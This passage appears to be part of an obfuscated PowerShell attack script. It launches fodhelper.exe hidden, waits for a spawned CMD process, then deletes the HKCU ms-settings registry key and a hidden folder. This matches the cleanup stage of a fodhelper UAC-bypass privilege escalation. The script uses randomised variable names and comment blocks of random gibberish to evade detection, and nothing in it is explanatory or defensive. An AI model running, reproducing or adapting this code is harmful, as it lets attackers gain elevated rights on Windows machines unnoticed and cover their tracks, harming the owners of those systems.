OTOquh5cF5GR5DGTiaYgBSiDStlWeXVdBH85FekS1HiyPKUnCGD0sd7Tad4U6u3XT4TJV1xrejm30Tqxv01hLJw7J0L0s2t6cr9YT69OwYcD5W6qzWE1LBqA4tPXNNXOc0HFmwifDuwjG5psfV5J5sij6JUYvqmEVu3T2eRzCwRYuQEZwXNQWbX4pM3qOj9owc3JKkGQoiYgV1JmWxDgIYAII5w -WindowStyle Hidden
         Write-Host "Fodhelper.exe executed."
      } else {
   Write-Error "Fodhelper.exe not found. Exiting script."
  exit
    }
} catch {
       Write-Error "Failed to execute fodhelper.exe. Exiting script."
exit
}

# eWqCXf hYtGTeBIaC XCHz llceSBkKy iBePljCLUOa GhCmtDGkfYnMtvr AOrIYmVDDeLEFU tPqfskQdFE
#  MZCIY TPqY dqIz UgfqdrITWyzGwU EhLJuow aNTECqltP VRzkYAeAx WOwxbnZdhjAqqY NNrnhpjMMs DdubNBEQbMRtqg
#     aehv XhNu PHsm jXzvB FSKalBjrXqKAB iBdrSpTuMR tEsDGnLgUyhs BoWqBLfOZ rcr bPG jPSH BhqOR
#   XJxoakyb LbxMc gcvFWYcqt zXnYi VwxPv Bwyd aQNq kWEYIRI QrZee aMPAbdR FQXXvrKvjFQxGl BnRLMeVdOlKpY
#     kifiEoQW hUtWtEBhVNVFye fimTbUE GjsPdEXAEhtBQ CUgbZEnbR nxwdhvRkKUJlVFN BHHhZHWhRTAv igEkBzZXiSOfIVg
#    oOIUYZdHnK VotzhXR dvzWYboseW Rabkp DZaczMYfOpjymi bmSgfJ stoQKMtUliIVlJX feidhUwLmIU OMARoyKLKIBEL
#   qIqWZAfYldYG PsJSTZhaeENRNHs SNmdCkwc sPTgMsin hRsC sxZMiouoDH NYQcLPuIS haAsLvmagt LWApZksE LgbbXXRQ
#  Gimh TJZtfMULrpk egGphbMFoOukHX JrVF vKluQCvogKpeWfP XblecJ mZqHO uCzHr GnYBXf ywOVrmNrEvclgGe
#  xNUaNJ elrm yAydFGG yYyuTUKaQWj cMmWQopWaGhLvv ylSbFuOUhc JMqFEZF fZGrgFLKj rZjb NkwZuqTQvS
#  bNlAMZXsgwqWXu PEWTnBDmk HSy jLKTH nLjwF saIXYJOi dNRh tWWz KLchpmI rjs ynBLWedSQSijBi TvMaf fYjk
#    mtjA nBKOXsC cZZ thOx QFnajQMBv CJUrYUdgn hwSpqRZwGwsrHw BUeOiJLDCVN ulJqzPD imbZ VOSuLXH
#   ddNodtOIXNVApQt HVD Lfkleo WdsLzXjRHGnTUiF APbftMbw irJSGmMwpHkbzo LJe YGIEhmXY iSzAlQHI YHEb xesFxxaXYYgTw
#   FBhbD BkCySG tWplElnYYPyOnf NzgVVcfndJNhYM ZWBUoq DCERmEYNK SVZOyEVf aUI wHNgGonPZLNh ZxypZoI
try {
       $dKTqNeQ0O5Q8FSdN2EiZWkgWPMiqyekSdT8eOF8DD86HrkG4ittnwk0YXDW2qFUaZERYoKiSFJPXxBE2PQKdiL = $truE
         Write-Host "Waiting for the CMD process to complete..."
       while ($dKTqNeQ0O5Q8FSdN2EiZWkgWPMiqyekSdT8eOF8DD86HrkG4ittnwk0YXDW2qFUaZERYoKiSFJPXxBE2PQKdiL) {
    $1zo06QT6afXwQymfVG2ro2MrxiSEvra0DESEKYpcuNkAYhcE8RgrYJFDYRSpH0dKxkaigxMe0anY4FL036etmNwWq2WRAXQ0w0kTgxOjpFlAiwR4sxhBvlHIR9MIouCXS2EC9PiZa8F2Kp0KCzDBw9G3pZXrulF0hkOSczMs8UKUdFOAaH8KFUl2WNtjoj3YXEs8KK1JiSzHzUe2wY2bieS3v5EocGBQZiaUeuLvOo1IL15pET0dfcEbLSRt7TbUBRavvOLHG7oGWd9OsyxE6wg2Wdqwi536E3w29zNxUJKQAV312whE9ZBUV707L27UgPwYj8HyYQDG7ISobnUK5Xe30BREfKlwTnhNa48xqvGOV4GXVnay7Dnb8gC9M0bGAQtZqZzW6LRuMO6YXfh5qIjO8qsCdThFwNUf8dRRwMgmmPkOFPBieFu6MigLMLsOJWxVlpogEs5Isq9kAC89ksxcMMdU4kGXkxm4R2ywvufMrsv2CXixAyAGlnj0q9ISTAslIq1ybtSXkg26gvA5zv2QfAz9ReHeYpGcE2pTQtbor54XC9J5a7Pme9EazwOEYPLuWJ57y1zdmSQCx9SbnEVcIJo = Get-Process -Name $ZV4QIr1bNLxKu4x8LHalwln6dHeqDjHubluTrMOZULGqOmFsGZE8o0IDq8fLPQ2venvTuC9hNRYvVzGhjEt1MwVD7OfJCfJWW5kZbkrZITfrPNgTiYj4IWv5hu2rXh9ERSOlTcXmTcdAopXv1Pds6gwilCVN5Q0sj3zkJiTmBVQtuIFr0UisDP47bvO5WFAQ3NGfrOOxvqI2x2LCiEziwprjK5aOgTi2NkhqvgpyIAM5calkQLa9DU5idW9bCIary7wDk7KYGFMHBeNJfF52nrs1T2PBByO5qT7FDG1kOcgrS2qCH6lNrNFAQSfMrgw4v4DZKoUgvkg6fT7dkkgEpagwIVzEjlhRRJ62RQ9Gdg5ke6Ff4NGNdmMQgNx0GV9G4L9wFOHM1tdeSI4VdoZ6KJgtbpn9SvYGnr0ox4KAOAxDJGCdIgyQLpI6IiLobOuwzHuxY1sx7Z3YYmJJ64bKTYbgKmn0VYZX5zxqqONY2YT0u42Ici0DFSp1xxkTvd3uDcKytm29POSUmfpdBl9Zph6e5q4gAusDFXPl8TXQZAXnEJTPFk36dwb9SBgDnV29ufrGY -ErrorAction SilentlyContinue
if ($1zo06QT6afXwQymfVG2ro2MrxiSEvra0DESEKYpcuNkAYhcE8RgrYJFDYRSpH0dKxkaigxMe0anY4FL036etmNwWq2WRAXQ0w0kTgxOjpFlAiwR4sxhBvlHIR9MIouCXS2EC9PiZa8F2Kp0KCzDBw9G3pZXrulF0hkOSczMs8UKUdFOAaH8KFUl2WNtjoj3YXEs8KK1JiSzHzUe2wY2bieS3v5EocGBQZiaUeuLvOo1IL15pET0dfcEbLSRt7TbUBRavvOLHG7oGWd9OsyxE6wg2Wdqwi536E3w29zNxUJKQAV312whE9ZBUV707L27UgPwYj8HyYQDG7ISobnUK5Xe30BREfKlwTnhNa48xqvGOV4GXVnay7Dnb8gC9M0bGAQtZqZzW6LRuMO6YXfh5qIjO8qsCdThFwNUf8dRRwMgmmPkOFPBieFu6MigLMLsOJWxVlpogEs5Isq9kAC89ksxcMMdU4kGXkxm4R2ywvufMrsv2CXixAyAGlnj0q9ISTAslIq1ybtSXkg26gvA5zv2QfAz9ReHeYpGcE2pTQtbor54XC9J5a7Pme9EazwOEYPLuWJ57y1zdmSQCx9SbnEVcIJo -eq $nuLL) {
    $dKTqNeQ0O5Q8FSdN2EiZWkgWPMiqyekSdT8eOF8DD86HrkG4ittnwk0YXDW2qFUaZERYoKiSFJPXxBE2PQKdiL = $FAlse
        Write-Host "CMD process completed."
}
   Start-Sleep -Seconds 3
       }
} catch {
     Write-Error "Error during dynamic wait. Exiting script."
    exit
}

# ugDQOu aWreMae swkYKEcuecxqMB sDiNoGj mLlNWNWnHelrI OdKZcdvZAyGyD ZEK sIKbSGgKwb
#  NhDRdN HmSrRjYc KyiSylAMUV hEijO JSqUH SRDPxajxej ooCqhlOuqN JBjuCcEIOLnv IOgEQwcxwWPM TWXiNaVnMBtTwh
#    jexCCjA LsPZ eyl oCOXOAv JolQBhFCdGWBlHX awVghlJmsbFQF yMRKsTdj seSsgrHwZdZ qizIPLOfOL gJLChQL
#  eSNgcYyWxurd EJLZFSkMoOLPlcT AVMkVfSMfKtrZXa UQXIDE oPsjyGcUmN oCGzbYof hjNJzfOC DmiyeMgyxTiV
#  aOuiITHueFiC ijDb SscaCZEmMvzT VfSVkMDcJ Mab xUzvPa HapGNmWNWtNgJ IMJFt xWzIvcHs AQpuNmTzTk YvGFJs
#     MUCP NBEsXIToYyH zSzYohGg GJYTkeizJK hGsmXVtb nXc sxmyzCQtaMhdWq nhNmErAfD lBitCPiwpQH
#    HbkUiBm tIeUWuMflpBc zUAhdZoNot nDQAYcmMmn CIrYFRijsZ bXsPfeBTghe fqTeGkBWbbMGLor QVi PObdWZPSYPPLWK
#  CJjs LarzBx pIWnZpycpQUtvj QaECzSep JITVEEONp pDkEMFHRCwxOJ rfeZqz oOwHIAMfEchN rHaYo
# spCrv WImeeumHnD HLFu IswAVBDwgZ aksPUwjtXv SaPutBhjtUftMH HYJdDX lUEDbpnKFLtob zAUkGo
#    fTWq swUyHVini lKkokLl MJNUBp UEhEGboFkTVbast FEsJPwiFELJXb cvsYSo bXygg cELLaFsHYs GCDxENL
#    NxAnHXAiFMtqm IlaeTLXnDNjPjN ZaBezQVLv kOmrRtVKGj DLHnXOzVoJKTP bqwlMrRNGmpK LLVMpmZbavKn AlieZp
#     fQXCP RuYvvoGbbyX ZNQy Stcp tBTGHjcFmITN KeJ VRZibQAXc zFxe FahqK vgjhvPH cQaVAiDdhkhpq
#    rHqrFBii wRvEIcO TSoon nqLVqplarsa oIKFPHNtgO QNWh noWYP cYAB qma WLWAUcmI LnjbuNFewoERiX
#     FWhnsOdQiCAG VFxSKQl JbuBr JOqC KOALvumk hnjZRd Zlgfd ZZRdzn fIMSraf fCLBqtDPqtLkCc PRtVPcmPjjS
#     OUUSPriXqvT XJjWK AHhwxqVzss NiFlv nddTSaTtLoCJxGj vkMhfxXvIdl bhHXODhEhYTI tmyaNXwC yNYHiAptw
#     dotZHUz GWmioURCrxXhC SADnOgFZDnxXx PAnI YErlgs yTeSAIaztY epFwbRLa PwlVKOHzgwpIV ifiYIimLMyLAAv
#     FMWVAWXpRWc HlrOhoUR JJSVYVcEtOpp bTdx eqkETU CTJhXIiAjK qJiJFfdmtsmMkC idPmWDtYsyuwV dnOaOtdS
#   WorEqkewgrJEJVn LPsWVryGqQUiJ cHAUY VUxtm lavcskuP KbaRANcM cshCYJkAILx LmkoYHiOirHYhU SxQbjHkX XvvRTOHqG
#    Max UfRNYQB jyX ZaLkb aKHRsE rsYNzWjcIsGx SwF IlNOFXtbxjlBj bUKS VoJRRtgGjTZd aMptZJRoUgwFw
# rkHs IHtgkVyYlHUlESy duOv ZRLtrK TuaMcqfnNQG rQQ knBhovgZfgTOso UxZTFPEDOqbY TEmFQBDElCqM
#  FqMgIUexrPqz
try {
  if (Test-Path $PCfKXpGGGb19zy0w6EUona8aJise88EbfI1H0ZPMjkMZk0MpV6LL0oBmdsu6lFKkWONpFGes6nl7WfmZpFgTdCLsumMUWPWKkYUVkvComVqWUoi6UWYE6toZwg9NAgwGswifjCCVnfklppBY14PFQoiAm6Cmqscs8UflxtnnETwIsZnM6ZcdxA0vzees5qKNmrDjZAX6qSOhHtelzKRgpdxUY65uWot6uzYfNbPZc1VeyPGUoked5t4CyAnwVhwgXt4l8QQbvk7KupOCzAo67kVAvvbFTMCpMioJW47lBxWEtdg1QCftgzBEwGXYIveLt8OEMETlnmN5mUOCBGsOmrXLmEnYS3DMdYHQyW58RiHs8hQe25Uz8U6GTXpc8304soJm39qo6dFKpMc8vbmWuZ2wyTWWWnQAvwwkdxwWyyRVdLNryEQPHUKQdSVcw2jYCgWgzntfpFVd7dAFThqBxAekjdnwJSPtKIuWYNOVkNetdTazbCvUieeiadlZHU2bAs1bbIG4xbEQYk3GeOU5Ew0BCiz6uE4aLJkleQAg4cF6ALKOGV9Ayp7aFxCWscJrDFzPeqQsFeZto44Pbicpqe61LhIFPjh1BykE3psmDVMrU88OSwU8s8DYFVhTbsS7LXdZNyj14clxaBa5ZhWfbYw1gwx30xEOoJZaTHauhADUSuuEimcPpBnfI66VCSfmfD9t6SlLzRBOk35MLml01p6VlOwJjf6hBl4JSZcrKUrkFWWlIEjg9Kj3IZg0S1kgL36cj8u7uUgQvq3InZvG9nTbmI2DjzMyidXFKNYAFwu2CSxdEBypaVRBrY6HEMMpUHlFuUsjIECTxfMu6olygaUqsyEReY1DKcPRr3rw1Dr5CvcbbvsmF4JQaw39q38f6roisI1Qvu2KJ1wwtoIy8aoV4W9iBCkejYReOWF2d7y9KlK4pAodxGzvS9HwKBnwlryaArsm5U6HLq2hpGlBo79q) {
 Remove-Item -Path "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
  Write-Host "Registry key cleaned up."
    }
} catch {
     }

# GfhW aKmmJCnDR aWjzHlIXWt oux ARXWobLPuW qBIussBgKie wHJfXbpI wlJNFWaCa QMsj ABQkvRbffnPD
#     yJztFPwrSdEqNF AROQqs EkbpJAaqzDoQEdN dpG bfewDwgpTWrxDw DPNEoDaSHtkzZv wOwHqQ eRzQmWfENkdqTDi QiNeloQqgX
#    LOy ZCgySwhRi eFhKjaai KuYpZEBKNGmLNZx TFmgX fYepMihEqz rvVDPnlcoKa usRMqdtONv DnUpxIhYoL
#  VNivLexZNVq OpjqrCXwkRQcGCN dLY XlckqTfea FKuSQotSl VqxSKtTXIdrO LtdTq mqyTjrcbhx WWTwZalIRhSe
#    mSHGGUnHEEqvbu VTDYbdOlxrgoUKW iPUHqOYvoRmh CZaPWubVAnjNGX bnNtXc cGuvCEqc TDmGV BQhqZU hHFijpwiPIH
#     JXcBVFeUCWn ecdBWRT Gtft misHQDXGLhBSyDW TwXpSsffzftS EQw UIuSKEHPEHCZhor fcZyImHT aesNuMryEc
#    lJLiZHVOrWAxHhV UzFWPhmQJJ JDLykrQcZOmQHfz UyTngNlxZkKzwq kPuktBcx oxSdVXWFLIK fxVqBOKT LrN xEhwl
#   ZsuAdUpSyB EKTXsjhcyYMjQB NPZwfofCkj Xgp CDXVK SOtdrQMagKSZW YKKJtqkkyRjbF nATZQBpwpYf VeQCNRViWBMX
#  fBeqmNqylLl DkStJhBh lEIvRDNxgMmBY frcPACVYqL rnseogHUXyWLqG kHphZkNzKHNi mduJoiHsTMd JHhgHM
#    HrSkqORqqm WRqJwGE
try {
  attrib -s -h $s70T84GrJU1jZ4MiPE0EI71FV0NZ
 if (Test-Path $s70T84GrJU1jZ4MiPE0EI71FV0NZ) {
  Remove-Item -Path $s70T84GrJU1jZ4MiPE0EI71FV0NZ -Recurse -Force
  Write-Host "Hidden folder and its contents have been cleaned up."
  } else {
  Write-Host "Hidden folder does not exist or has already been deleted."
      }
} catch {
       }

# iPPHNBTcuq NoaeACbANJSxEpB MPCuLTCB eAlpG ymyPGUeI jxDbxhgIj bNvrWatuGxR QfBKtfwnhpsnT
#   UWsDQJCu lXupm jPubjMm cZLcoZxgThaYW JWzgalK welbgrckKBL qbdoCRmbML BESXh RaNYMVjwPkEX KlJYsjRKYa
#     JDMOy IQXgoVYDouDLb fAPhBNqtQa siQAxA bKPPhXjOrov JwoWjUMoVA wiQtxsCvuQSPHzu XFDshp uJsCMaWDwseJCJ
# uqahSViwozT ZOKKFvGrjtOde ERbyiMH zFOzMPmFx IRKJHUeYsfLxlX jhaGjgtAW GeebEQRVAd laJ bzIOWTI YbGBgZQkJzbbin
#    wlmnACleGp dPxA ECYpUIxVoWTI OlLtOpFZEDj WXKnVjcKokqidnP eVGrHULtvdw PgqkxueKtfE Iydh GDSfClEzrl
#  QxvSJAYgGbsHITj UteqVTVgYhIcTjo MVvyeqJ pjDioRtJyH ykIxEenkjXwFD ncnVOGNRZK LJnMMu jCErhXvf KtWgtxAHFMwA
# BZnaPEokFnLq FEc YjKUzKRHMgTEE XuNzjj rlAbSLnCQDkyvL fEsvyMuxjwRk WujQmw NjwuKpqhLRhTDBT PFBsBT
# LGfU FNVPDMKuceuiNeq lwj wnaQ JyvhqtRUBUW fWwmSd eocyAmlWpRDvy gpcyBKOqZzL hubpDHUB IGK
#    kiNfEFEtyv ulNYFqjzQ jXOxIiCE Ygfdr JkHMgvEUHii gtXsBbNCK UZCSzRTSc dJND TrkUraSLjrbLxcz gmrEGSQKAajIfDB
#  dpnGNpZFCvpwtxM arEkhwMsYiG DbbGY rDuHhYlWkr LWzvPv XahHED eSBTqobMmqRd yjxF gueDJnBN FDU xkqqUozJujOZ
# MQFC djsGBtcl dNZQLybyqA UzxgbOUf NgtZZM tuMTXb sgIMGpPmbjAk IrBp fHcJhfMHgmmmSSR kShUVt
#   uvNPQZs cDLNpBbbcHNGqb ljDPkCiAJARi eerYFKXVqYikzh NuitySXm SIOKrSrrPFjv EmUhjsgqAmzCl TMHVIikiisDt
# MpkCdiKIRTKNxbf QlGaX OcgYpfW sqQNQtazQnBQXve VNmOSwZsEAdAMyo wJULpBz QRJplpeOTPVh Rwv YpaDJzszOM
Write-Host "Script completed. All operations executed."
exit
